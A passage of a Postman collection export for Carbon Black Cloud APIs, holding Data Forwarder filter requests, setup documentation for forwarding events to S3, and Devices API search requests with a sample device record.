\"QUERY_INVALID_FIELD\",\n    \"message\": \"field netconn_application_protocol is not valid for version 1.0.0\",\n    \"args\": [\n        \"netconn_application_protocol\",\n        \"1.0.0\"\n    ]\n}"}],"_postman_id":"c4ec9f82-0b60-4ac7-bdb3-9c17fff29271"},{"name":"Create Filter on Forwarder","event":[{"listen":"test","script":{"exec":["pm.test(\"Setting filter_id after successful creation\",","    function() {","        var response = pm.response.json();","        pm.response.to.have.status(201);","        pm.environment.set(\"cb_forwarder_filter_id\", response.id)","    }",")"],"type":"text/javascript","id":"d140430b-9e26-4e4c-951f-5467f7a8cce8"}}],"id":"0edf3b42-37cf-4598-bdbc-2f2b25f9ae17","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"Demo filter 1\",\n  \"enabled\": false,\n  \"action\": \"EXCLUDE\",\n  \"query\": \"event_origin:edr AND (process_path:c\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\*) AND type:(endpoint.event.procstart OR endpoint.event.netconn)\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}/filters","description":"<p>Create a filter for the specified configuration to include or exclude data from being forwarded.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}","filters"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0edf3b42-37cf-4598-bdbc-2f2b25f9ae17"},{"name":"Get Filters on Forwarder","id":"09ac799f-953d-4a5f-9831-762bdaa2bdf8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}/filters","description":"<p>Get all filters for the specified configuration</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}","filters"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"09ac799f-953d-4a5f-9831-762bdaa2bdf8"},{"name":"Get Specific Filter on Forwarder","id":"fbef4552-648e-4427-b2b6-c860ec4c2850","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}/filters/{{cb_forwarder_filter_id}}","description":"<p>Get a specific filter by id for a given configuration.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}","filters","{{cb_forwarder_filter_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"fbef4552-648e-4427-b2b6-c860ec4c2850"},{"name":"Get Available Data Versions","id":"81dcb050-412b-4039-b24b-5a675267b3d8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/versions","description":"<p>Get a specific filter by id for a given configuration.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","versions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"f8019313-dc0d-4195-b6ad-dd484e23c7e2","name":"Get Available Data Versions","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/versions"},"_postman_previewlanguage":"json","header":[{"key":"Content-Type","value":"application/json","description":""}],"cookie":[],"responseTime":null,"body":"{\n    \"available_versions\": [\n        {\n            \"type\": \"alert\",\n            \"versions\": [\n                \"1.0.0\",\n                \"2.0.0\"\n            ]\n        }\n    ]\n}"}],"_postman_id":"81dcb050-412b-4039-b24b-5a675267b3d8"},{"name":"Edit Filter on Forwarder","id":"bd4c7161-eee1-4fb7-b3d5-430aada65f47","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"Demo filter 1\",\n  \"enabled\": false,\n  \"action\": \"EXCLUDE\",\n  \"query\": \"event_origin:edr AND (process_path:c\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\*) AND type:(endpoint.event.procstart OR endpoint.event.netconn)\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}/filters/{{cb_forwarder_filter_id}}","description":"<p>Adjust an existing a filter by modifying the query, renaming the filter, changing the action, or enabling/disabling the filter.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}","filters","{{cb_forwarder_filter_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"9efe16ab-be70-4ff2-8882-6f4c78d26631","name":"Edit Filter on Forwarder Copy","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"Second Test Filter\",\n  \"enabled\": false,\n  \"action\": \"EXCLUDE\",\n  \"query\": \"event_origin:edr AND (process_path:c\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\*) AND type:(endpoint.event.procstart OR endpoint.event.netconn)\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}/filters/{{cb_forwarder_filter_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 21 Jul 2023 18:32:58 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"324"},{"key":"Connection","value":"keep-alive"},{"key":"X-Request-Id","value":"71d7093d-8db4-4711-a46f-b86b4d43aa87"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"1234abcd-9119-45ef-83f3-1ff36ad10d1d\",\n    \"name\": \"Second Test Filter\",\n    \"query\": \"event_origin:edr AND (process_path:c\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\*) AND type:(endpoint.event.procstart OR endpoint.event.netconn)\",\n    \"action\": \"EXCLUDE\",\n    \"create_time\": \"2023-07-21T18:27:51Z\",\n    \"update_time\": \"2023-07-21T18:32:58Z\",\n    \"enabled\": false\n}"}],"_postman_id":"bd4c7161-eee1-4fb7-b3d5-430aada65f47"},{"name":"Delete Filter on Forwarder","id":"6e16b7a4-af06-4d31-83f1-b66fcdf20338","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}/filters/{{cb_forwarder_filter_id}}","description":"<p>Use this call to delete a filter.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}","filters","{{cb_forwarder_filter_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6e16b7a4-af06-4d31-83f1-b66fcdf20338"}],"id":"2f231d79-6039-4e1e-8120-08da542176a4","description":"<h1 id=\"data-forwarder-configuration-api\">Data Forwarder Configuration API</h1>\n<h2 id=\"introduction\">Introduction</h2>\n<p>The Carbon Black Cloud Data Forwarder lets you send data about alerts and events to an AWS S3 bucket where it can be reconfigured to port into other applications in your security stack, such as Splunk. The Data Forwarder is recommended over APIs for obtaining large amounts of data from Carbon Black Cloud in real time.</p>\n<h3 id=\"available-forwarder-types\">Available Forwarder Types</h3>\n<p>*   <strong>alert</strong>\n*   <strong>endpoint.event</strong>\n*   <strong>watchlist.hit</strong></p>\n<h3 id=\"requirements\">Requirements</h3>\n<p>*   Carbon Black Cloud Endpoint Standard or Enterprise EDR\n*   API Key with appropriate permissions\n*   Configured S3 bucket in the same region as your CBC tenant</p>\n<h2 id=\"quick-setup-with-postman--s3-bucket-configuration\">Quick Setup with Postman &amp; S3 bucket Configuration</h2>\n<p>Follow the step-by step guide for enabling the Carbon Black Cloud Data Forwarder using Postman found <a href=\"https://community.carbonblack.com/t5/Developer-Relations/Carbon-Black-Cloud-Event-Forwarder-Quick-Setup-in-Postman-amp-S3/td-p/89194\">here</a>. This will walk you through the following steps:</p>\n<ol>\n<li>Create a bucket in your AWS Management Console</li>\n<li>Configure an AWS S3 Bucket to allow the Data Forwarder to write events</li>\n<li>Create New Access Level in the Carbon Black Cloud Console</li>\n<li>Create New API Key in the Carbon Black Cloud Console</li>\n<li>Configure the API in Postman</li>\n<li>Create a New Alert, Event or Watchlist Hit Forwarder</li>\n<li>Monitor the Data Flow to the S3 Bucket</li>\n</ol>\n<h3 id=\"alternative-bucket-setup\">Alternative Bucket Setup</h3>\n<p>If you already have an AWS S3 bucket or are looking for additional ways to configure your bucket for varying levels of access and other use-cases, see <a href=\"https://community.carbonblack.com/t5/Developer-Relations/Writing-an-S3-Bucket-Policy-for-the-Carbon-Black-Cloud-Event/td-p/89171\">here</a>.</p>\n<h2 id=\"data-format\">Data Format</h2>\n<h3 id=\"s3-data-storage-format\">S3 Data Storage Format</h3>\n<p>Currently the Carbon Black Cloud Data Forwarder only supports output to AWS S3 buckets provided by customers. The Data Forwarder outputs gzip compressed single-event-per-line JSON format (sometimes known as “JSONL”) to the customer’s S3 bucket with the following folder structure:</p>\n<p><code>org_key={org_key}/year={year}/month={month}/day={day}/hour={hour}/minute={minute}/second={second}/{uuid}.jsonl.gz</code></p>\n<p>Therefore, if a batch of events occurred on August 27, 2019 at 12:36:53UTC for the organization with org_key ABCD1234 can be located in:</p>\n<p><code>org_key=ABCD1234/year=2019/month=8/day=27/hour=12/minute=36/second=53/ac203140-f0e2-48fe-90cf-05eb7289f628.jsonl.gz</code></p>\n<h3 id=\"data-mapping\">Data Mapping</h3>\n<p>You can find the Alert, Event and Watchlist Hit schema as well as sample data in the <a href=\"https://community.carbonblack.com/t5/Developer-Relations/Carbon-Black-Cloud-Event-Forwarder-Data-Mapping/td-p/89192\">Data Mapping Guide</a>.</p>\n<h2 id=\"authentication\">Authentication</h2>\n<p>Use the following information for authentication, and see the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/authentication\">Carbon Black Cloud Authentication Guide</a> for full instructions.</p>\n<p>*   <strong>Access Level</strong>: Before you create your API Key, you need to create a “Custom” Access Level for the <strong>“Data Forwarder”</strong> category\n    *   To use all functions of the Data Forwarder, allow the following permissions: <code>Create</code>, <code>Read</code>, <code>Update</code>, <code>Delete</code> (or see each call below for individual requirements)\n*   <strong>API Key</strong>: When you create your API Key, use the Access Level Type of “Custom”, then select the Access Level you created.\n*   <strong>Environment</strong>: use the URL of your Carbon Black Cloud console (this is the Dashboard URL).\n*   <strong>API Route</strong>: <code>data_forwarder_config/v2/orgs//configs</code>\n    *   <em>Note: when you insert your org_key, you must also remove the &lt; &gt; brackets.</em></p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"8729a8b5-d2ca-4b92-9b49-5c235ac24681"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"1390d744-345d-4b71-9e2f-332a96d40881"}}],"_postman_id":"2f231d79-6039-4e1e-8120-08da542176a4","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Devices API","item":[{"name":"Search Devices","id":"e283f36b-620b-4abd-b4a2-638dcb58912d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"ad_distinguished_name\": [ \"<string>\", \"<string>\" ],\n        \"ad_domain\": [ \"<string>\", \"<string>\" ],\n        \"ad_group_id\": [ <long>, <long> ],\n        \"ad_org_unit\": [ \"<string>\", \"<string>\" ],\n        \"auto_scaling_group_name\": [ \"<string>\", \"<string>\" ],\n        \"base_device\": <boolean>,\n        \"cloud_provider_account_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_managed_identity\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_network\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_resource_group\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_resource_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_scale_group\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_tags\": [ \"<string>\", \"<string>\" ],\n        \"cluster_name\": [ \"<string>\", \"<string>\" ],\n        \"compliance_status\": [ \"<string>\", \"<string>\" ],\n        \"datacenter_name\": [ \"<string>\", \"<string>\" ],\n        \"deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"esx_host_name\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_id\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_status\": [ \"<string>\", \"<string>\" ],\n        \"asset_group_id\": [ \"<string>\", \"<string>\" ],\n        \"asset_group_name\": [ \"<string>\", \"<string>\" ],\n        \"host_based_firewall_status\": [ \"<string>\", \"<string>\" ],\n        \"id\": [ <long>, <long> ],\n        \"infrastructure_provider\": [ \"<string>\", \"<string>\" ],\n        \"last_contact_time\": {\n            \"end\": \"<string>\",\n            \"range\": \"<string>\",\n            \"start\": \"<string>\"\n        },\n        \"os\": [ \"<string>\", \"<string>\" ],\n        \"os_version\": [ \"<string>\", \"<string>\" ],\n        \"policy_id\": [ <long>, <long> ],\n        \"sensor_gateway_url\": [ \"<string>\", \"<string>\" ],\n        \"sensor_version\": [ \"<string>\", \"<string>\" ],\n        \"signature_status\": [ \"<string>\", \"<string>\" ],\n        \"status\": [ \"<string>\", \"<string>\" ],\n        \"sub_deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"subnet\": [ \"<string>\", \"<string>\" ],\n        \"target_priority\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_host_url\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_name\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_uuid\": [ \"<string>\", \"<string>\" ],\n        \"virtual_private_cloud_id\": [ \"<string>\", \"<string>\" ],\n        \"virtualization_provider\": [ \"<string>\", \"<string>\" ],\n        \"vm_uuid\": [ \"<string>\", \"<string>\" ]\n    },\n    \"exclusions\": {\n        \"sensor_version\": [\n            \"<string>\"\n        ]\n    },\n    \"query\": \"<string>\",\n    \"sort\": [\n      {\n        \"field\": \"<string>\",\n        \"order\": \"<string>\"\n      }\n    ],\n    \"rows\": \"<long>\",\n    \"start\": \"<long>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/_search","description":"<p>Search devices in your organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api/#search-devices\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","devices","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"b2785dd6-bc34-462b-8138-20472de0d7b5","name":"Search for Devices by IP","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n        \"deployment_type\": [\"ENDPOINT\"],\n        \"target_priority\": [\"MEDIUM\"],\n        \"last_contact_time\": {\n            \"start\": \"2023-10-01T00:00:00.000Z\",\n            \"end\": \"2023-11-22T00:00:00.000Z\"\n        }\n    },\n  \"rows\": 5,\n  \"start\": 0,\n  \"sort\": [\n    {\n      \"field\": \"av_pack_version\",\n      \"order\": \"ASC\"\n    }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/_search"},"status":"OK","code":200,"_postman_previewlanguage":"Text","header":[{"key":"Date","value":"Wed, 22 Apr 2020 16:27:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"2799"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Server","value":"Apache-Coyote/1.1"},{"key":"Set-Cookie","value":"JSESSIONID=E4DE5470E8CB5E9DAF889F42561ADCB0; Path=/appservices; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 1,\n    \"results\": [\n        {\n            \"activation_code\": null,\n            \"activation_code_expiry_time\": \"2023-02-16T01:26:40.571Z\",\n            \"ad_domain\": null,\n            \"ad_group_id\": 0,\n            \"ad_org_unit\": null,\n            \"appliance_name\": null,\n            \"appliance_uuid\": null,\n            \"auto_scaling_group_name\": null,\n            \"av_ave_version\": \"8.3.66.192\",\n            \"av_engine\": \"4.15.14.50-ave.8.3.66.192:avpack.8.6.2.18:vdf.8.20.12.212:apc.2.11.2.6:vdfdate.20231121\",\n            \"av_last_scan_time\": null,\n            \"av_master\": false,\n            \"av_pack_version\": \"8.6.2.18\",\n            \"av_product_version\": \"4.15.14.50\",\n            \"av_status\": [\n                \"AV_ACTIVE\",\n                \"ONDEMAND_SCAN_DISABLED\"\n            ],\n            \"av_update_servers\": null,\n            \"av_vdf_version\": \"8.20.12.212\",\n            \"base_device\": null,\n            \"cloud_provider_account_id\": null,\n            \"cloud_provider_resource_id\": null,\n            \"cloud_provider_tags\": [],\n            \"cloud_provider_resource_group\": null,\n            \"cloud_provider_scale_group\": null,\n            \"cloud_provider_network\": null,\n            \"cloud_provider_managed_identity\": null,\n            \"cluster_name\": null,\n            \"compliance_status\": \"NOT_ASSESSED\",\n            \"current_sensor_policy_name\": \"Standard\",\n            \"policy_override\": false,\n            \"quarantined\": false,\n            \"datacenter_name\": null,\n            \"deployment_type\": \"ENDPOINT\",\n            \"deregistered_time\": null,\n            \"device_meta_data_item_list\": [\n                {\n                    \"key_name\": \"OS_MAJOR_VERSION\",\n                    \"key_value\": \"Windows 10\",\n                    \"position\": 0\n                },\n                {\n                    \"key_name\": \"SUBNET\",\n                    \"key_value\": \"12.345.67.8\",\n                    \"position\": 0\n                }\n            ],\n            \"device_owner_id\": 16941161,\n            \"email\": \"\",\n            \"esx_host_name\": null,\n            \"esx_host_uuid\": null,\n            \"first_name\": null,\n            \"golden_device\": null,\n            \"golden_device_id\": null,\n            \"asset_group\": [\n              {\n                \"id\": \"fb32fcc1-3bfe-4945-9b6a-46a5049856cd\",\n                \"name\": \"test\",\n                \"membership_type\": \"DYNAMIC\"\n              }\n            ],\n            \"host_based_firewall_reasons\": [],\n            \"host_based_firewall_status\": \"NOT_ENABLED\",\n            \"id\": 17853586,\n            \"infrastructure_provider\": \"NONE\",\n            \"last_contact_time\": \"2023-11-21T21:19:40.237Z\",\n            \"last_device_policy_changed_time\": null,\n            \"last_device_policy_requested_time\": \"2023-10-12T15:06:31.509Z\",\n            \"last_external_ip_address\": \"12.345.56.8\",\n            \"last_internal_ip_address\": \"12.345.67.89\",\n            \"last_location\": \"OFFSITE\",\n            \"last_name\": null,\n            \"last_reported_time\": \"2023-11-21T18:34:06.169Z\",\n            \"last_reset_time\": null,\n            \"last_shutdown_time\": null,\n            \"linux_kernel_version\": null,\n            \"login_user_name\": \"WIN10\\\\johndoe\",\n            \"mac_address\": \"005056a560c7\",\n            \"middle_name\": null,\n            \"name\": \"Win10\",\n            \"nsx_distributed_firewall_policy\": null,\n            \"nsx_enabled\": null,\n            \"organization_id\": 6443217,\n            \"organization_name\": \"myorg.com\",\n            \"os\": \"WINDOWS\",\n            \"os_version\": \"Windows 10 x64 SP: 0\",\n            \"passive_mode\": false,\n            \"policy_id\": 20383608,\n            \"policy_name\": \"Standard\",\n            \"registered_time\": \"2023-02-09T01:45:41.510Z\",\n            \"scan_last_action_time\": null,\n            \"scan_last_complete_time\": null,\n            \"scan_status\": null,\n            \"sensor_gateway_url\": null,\n            \"sensor_gateway_uuid\": null,\n            \"sensor_kit_type\": \"WINDOWS\",\n            \"sensor_out_of_date\": true,\n            \"sensor_pending_update\": false,\n            \"sensor_states\": [\n                \"ACTIVE\",\n                \"LIVE_RESPONSE_NOT_RUNNING\",\n                \"LIVE_RESPONSE_NOT_KILLED\",\n                \"LIVE_RESPONSE_DISABLED\",\n                \"CB_FIREWALL_INACTIVE\"\n            ],\n            \"sensor_version\": \"3.9.1.2451\",\n            \"status\": \"REGISTERED\",\n            \"target_priority\": \"MEDIUM\",\n            \"uninstall_code\": \"ASKD324A\",\n            \"vcenter_host_url\": null,\n            \"vcenter_name\": null,\n            \"vcenter_uuid\": null,\n            \"vdi_base_device\": null,\n            \"vdi_provider\": \"NONE\",\n            \"virtual_machine\": true,\n            \"virtual_private_cloud_id\": null,\n            \"virtualization_provider\": \"VMW_ESX\",\n            \"vm_ip\": null,\n            \"vm_name\": null,\n            \"vm_uuid\": null,\n            \"vulnerability_score\": 0,\n            \"vulnerability_severity\": null,\n            \"windows_platform\": null,\n            \"last_policy_updated_time\": \"2023-01-27T22:04:59.571Z\"\n        }\n    ]\n}"}],"_postman_id":"e283f36b-620b-4abd-b4a2-638dcb58912d"},{"name":"Specific Device Information","id":"3d5200cc-b4ad-433e-8cdf-5f42ed5f5981","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/{{cb_device_id}}","description":"<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api/#specific-device-information\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","devices","{{cb_device_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"3d5200cc-b4ad-433e-8cdf-5f42ed5f5981"},{"name":"Scroll Devices","id":"9dfa5439-757b-474f-a539-b69fc8bb4435","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"ad_distinguished_name\": [ \"<string>\", \"<string>\" ],\n        \"ad_domain\": [ \"<string>\", \"<string>\" ],\n        \"ad_group_id\": [ <long>, <long> ],\n        \"ad_org_unit\": [ \"<string>\", \"<string>\" ],\n        \"auto_scaling_group_name\": [ \"<string>\", \"<string>\" ],\n        \"base_device\": <boolean>,\n        \"cloud_provider_account_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_managed_identity\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_network\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_resource_group\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_resource_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_scale_group\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_tags\": [ \"<string>\", \"<string>\" ],\n        \"cluster_name\": [ \"<string>\", \"<string>\" ],\n        \"compliance_status\": [ \"<string>\", \"<string>\" ],\n        \"datacenter_name\": [ \"<string>\", \"<string>\" ],\n        \"deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"esx_host_name\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_id\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_status\": [ \"<string>\", \"<string>\" ],\n        \"asset_group_id\": [ \"<string>\", \"<string>\" ],\n        \"asset_group_name\": [ \"<string>\", \"<string>\" ],\n        \"host_based_firewall_status\": [ \"<string>\", \"<string>\" ],\n        \"id\": [ <long>, <long> ],\n        \"infrastructure_provider\": [ \"<string>\", \"<string>\" ],\n        \"last_contact_time\": 